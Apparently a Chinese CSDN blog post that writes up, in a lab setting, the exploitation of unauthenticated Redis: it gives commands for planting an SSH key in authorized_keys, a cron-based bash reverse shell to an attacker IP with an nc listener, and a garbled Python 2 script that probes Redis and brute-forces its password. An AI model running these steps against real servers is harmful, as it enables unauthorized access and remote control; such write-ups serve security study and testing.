redis未授权访问总结

最新推荐文章于 2023-06-07 16:05:57 发布
最新推荐文章于 2023-06-07 16:05:57 发布
阅读量303 收藏
点赞数
分类专栏: 未授权访问 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45746681/article/details/108919706
版权

这里写自定义目录标题

Centos搭建redis

首先,搭建redis,进行安装.以下为安装步骤:
1下载安装包命令为wget http://download.redis.io/releases/redis-2.8.17.tar.gz
2 tar xzvf redis-2.8.17.tar.gz #解压安装
3 cd redis-2.8.17 # 进入redis目录
4 make #编译
5 cd src/
cp redis-cli /usr/bin/ #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)
cd …
cp redis.conf /etc/ #将redis.conf拷贝到/etc/目录下
redis-server /etc/redis.conf # 使用/etc/目录下的redis.conf文件中的配置启动redis服务
便可成功启动服务
在这里插入图片描述
在这里插入图片描述

Apache和php安装

稍后补充

redis未授权访问漏洞复现

在攻击机kail当中 输入命令redis-cli -h 192.168.33.132 -p 6379

在这里插入图片描述
会发现 无法连接,这里的原因是Centos的防火墙没关,关闭防火墙后,会是这个

在这里插入图片描述

到此,redis未授权漏洞复现完成

redis未授权访问利用getshell方式

1 写入ssh进行getshell
需要条件:知道启动服务的用户
拥有.ssh目录
允许使用基于密钥认证的方式登陆
执行命令ssh-keygen -t rsa
,得到应该写入的公钥在这里插入图片描述
输入命令(echo -e “\n\n”; cat root.pub;echo -e “\n\n”) > 1.txt然后将生成的公钥保存在相应的txt文档中(相当于再公钥前端和后端都加入字符\n\n)

在这里插入图片描述

登录redis使用命令keys * 查看keys,然后config get dir 获取当前用户路径
set x +公钥写入
在这里插入图片描述
![(如果当前用户没有.ssh文件夹,执行ssh localhost就有了)
更改redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh或者是/home/user/.ssh)
设置上传公钥的备份文件名字为authorized_keys:
在这里插入图片描述
执行命令sava然后进行ssh连接
成功ssh进行连接

在这里插入图片描述
(如果ssh无法连接 大概率是服务器端/etc/ssh/sshd_config配置文件不准密钥登录或者设置/home/wang/.ssh/authorized_keys为600权限)

利用定时任务进行反弹shell

再攻击机kail上面执行nc -lvnp 444进行监听
然后分别执行一下命令

set xxx “\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.33.129/4444 0>&1\n\n”
config set dir /var/spool/cron
config set dbfilename wang
save
过一分钟便可收到shell
在这里插入图片描述

写入webshell方式进行连接

稍后补充

redis未授权访问的poc

#! /usr/bin/env python

import socket
import sys
def check(ip, port, timeout):
try:
socket.setdefaulttimeout(timeout)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, int(port)))
s.send(“INFO\r\n”)
result = s.recv(1024)
if “redis_version” in result:
return u"未授权访问"
elif “Authentication” in result:
file = open(“passwd.txt”)
for passwd in file.readlines():
pass = passwd.strip(’\n’)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, int(port)))
s.send(“AUTH %s\r\n” %(pass))
result = s.recv(1024)
if ‘+OK’ in result:
return u"存在弱口令,密码:%s" % (pass)
file.close()
except Exception, e:
pass
if name == ‘main’:
ip=sys.argv[1]
port=sys.argv[2]
print check(ip,port, timeout=10)

qq_45746681
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
idea插件报错导致不能启动的处理技巧
weixin_34335458的博客
04-22 2573
在安装IDEA的插件时,难免会遇到插件不合理导致的IDEA启动时报错,没有办法从IDEA的plugins管理面板卸载插件,那怎么办呢? 答:手动删除。查找IDEA的日志C:\Users\{username}\.IntelliJIdea2016.1\system\log\idea.log,启动IDEA并监控该日志行为及报错信息;然后在电...
MyBatisCodeHelperPro激活方法(有效)
热门推荐
分享不仅为了他人,同时也为了自己
04-01 5万+
插件下载地址 https://download.csdn.net/download/printf88/16301731 下载完成后解压 在IDEA中本地安装插件 File > Settings >Plugins 找到刚才的解压文件 选择你需要的版本压缩包点击确定重启Idea 激活方法 激活方法(自2.7.3):IDEA顶部菜单:Tools -> MybatisCodeHelper -> Activation -> OfflineActivat...
Redis授权访问漏洞复现的(三种方式)
永不垂头的博客
12-30 3426
Redis授权访问漏洞复现(三种方式) 一、Redis介绍 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。 二、漏洞简介及危害 漏洞简介 Redis因配置不当就会导致授权访问。在默认情况下,Redis会绑定在 0.0.0.0:6379。如果没有采用相关的策略,比如添加防火墙规则避免其他非信
redis授权
weixin_47224111的博客
10-16 2776
0X01redis介绍 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set()、zset(sorted set –有序)和hash(哈希类型)。 redis很大程度补偿了memcached这类key/value存储的不足,在部分场合可以对关系数据库起到很好的补充作用。它提供了Java,C/C++,C#,PHP,JavaScript,Perl,Object-C,Python,Ruby,Erlang等客户
Redis授权访问漏洞(一)先导篇
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-09 1417
Redis默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露到公网上。如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis以及读取Redis的数据。
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
Redis授权访问配合SSH key文件利用详解
01-19
Redis 授权访问的问题是一直存在的问题,知道创宇安全研究团队历史上也做过相关的应急,今日,又出现 Redis 授权访问配合 SSH key 文件被利用的情况,导致一大批 Redis 服务器被黑,今天我们来简要的分析下。...
redis授权个人总结-Mature1
08-03
1. 使SET和GET命令,可以完成基本的赋值和取值操作 2. Redis是不区分命令的写的,set和SET是同个意思 3. 使keys *可以列出当前数据库中
Redis 授权访问
qq_61553520的博客
05-17 354
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问等,Redis服务将会暴露到公网上,以及在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下进行授权访问Redis
redis授权访问
kimojinmmp的博客
04-03 2175
1.漏洞成因 Redis没有设置密码 Redis protected-mode 设置为no Redis以高权限启动 2.漏洞防御 限制redis访问:修改redis.conf文件 bind 127.0.0.1 修改默认端口:修改redis.conf文件 增加redis访问密码 3.漏洞利用 1.反弹shell 利用条件:以root权限运行时,通过写crontab来执行命令,反弹shell 1.开启任意监听端口:nc -nvlp 9999 2.set xxx “\n\n*/1 * * * * /bin/b
idea中安装redis插件以及使用指南
wxx151556的专栏
11-14 4万+
redis是很多企业优化数据存储的一个重要考虑方向,一般我们都会下载一个redis客户端进行访问。我的前一篇关于redis的文章也是用的redis desktop manager来访问远程redis的。     但是这些客户端有时非常不友好,例如想要查看某个key下面的value,需要使用get命令才可以,而且格式没有。     因此,我推荐使用intellij IDEA中的Iedis插件,非常
linux下安装redis及其中遇到的问题的解决方法
12-07 2106
1.将下载好的压缩包放到/usr/local目录下# tar xzf redis-3.0.2.tar.gz # cd redis-3.0.2 # make 提示错误 make: cc: Command not found make: *** [adlist.o] Error 127没有安装gcc环境,需要安装gcc # yum install gcc安装后检查是否安装成功 # ...
扩展 JFinal 中的 Redis 极速化插件 — RedisPlugin
sinat_32501475的博客
05-29 775
RedisPlugin 是 JFinal 支持 Redis 的极速化插件。
Redis授权访问利用总结
2ed
10-09 1614
漏洞概述 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。 漏洞...
Redis授权访问漏洞的重现与利用
qq_40882763的博客
03-24 1785
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
Redis授权访问漏洞复现与利用
Forget_liu的博客
06-07 2311
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
Redis授权访问漏洞利用总结
bylfsj的博客
03-16 703
0x01 redis介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。Redis因配置不当可...
Plugin ‘MyBatis Log Plugin‘ (version ‘2.1.3‘) is not compatible with the current version
qq_18102561的博客
08-03 4179
Plugin 'MyBatis Log Plugin' (version '2.1.3') is not compatible with the current version of the IDE, because it requires build 193.* or older but the current build is IU-203.6682.168 插件MyBatis Log Plugin 版本不兼容。 解决方法:file文件-->settings-->Plugins搜索Myb
IDEA中下载mybatis插件mybatis plugins 离线版安装
梦奇
10-25 6556
![第一步![](https://img-blog.csdnimg.cn/20191025163208216.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxMjUxNzE0,size_16,color_FFFFFF,t_70)...
redis 启用审计
最新发布
09-12
同时,确保审计日志的安全性,以防止授权访问和篡改。 总结起来,要启用Redis的审计功能,您需要在配置文件中设置`audit-enabled`参数为`yes`,并配置`logfile`参数指定审计日志的保存路径。通过审计记录,您...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值